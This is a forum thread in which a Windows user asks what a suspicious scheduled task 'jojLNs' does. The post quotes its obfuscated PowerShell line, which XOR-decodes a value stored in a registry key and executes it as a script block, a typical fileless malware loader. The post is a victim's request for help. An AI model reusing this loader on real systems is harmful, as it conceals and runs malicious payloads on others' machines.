Help to identify suspicious task "jojLNs"

Thread starter ErichBrutus
Start date Sep 14, 2022

Sep 14, 2022

ErichBrutus

I had a somewhat suspicious task scheduled called "jojLNs" for some reason, it was tasked to run a powershell script in System32, the contents of which look something like this: $BeGAuVtuCJ=[ScriptBlock];$nXopPKHXZuvg=[string];$RFmkrqWtsy=[char]; icm ($BeGAuVtuCJ::Create($nXopPKHXZuvg::Join('', ((gp 'HKLM:\SOFTWARE\DefaultUserEnvironment03ZVQpAT').'6YoArxq' | % { ($_ -bxor (27+16+8+74+21+21+3+0+0+2+3+1)) -as $RFmkrqWtsy }))))Can anyone please tell what it was doing and was it harmful in any way?

Continue reading...

You must log in or register to reply here.

Similar threads

Windows 10 Help identify suspicious tasks

Jatinder Singh Ss
Jun 5, 2023
Operating Systems

Replies: 0

Views: 11

Jun 5, 2023

Jatinder Singh Ss

Windows 11 Windows launches 4 CMD randomly that run in the background.

Replies: 0

Views: 17

Nov 10, 2022

Arsalas

Windows 11 Powershell windows popping up every day, just for a second.

Replies: 0

Views: 17

Jan 5, 2023

joeo sullivan

Windows 11 Unknown Power shell script running

Replies: 0

Views: 11

Feb 25, 2023

Danial Hussain

Windows 10 How to identify unexpected shutdown cause(s)

Replies: 0

Views: 25

Feb 25, 2021

swvajanyatek

Facebook X (Twitter) LinkedIn Reddit Pinterest Tumblr WhatsApp Email Link

This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
By continuing to use this site, you are consenting to our use of cookies.

Accept Learn more…

Back

Top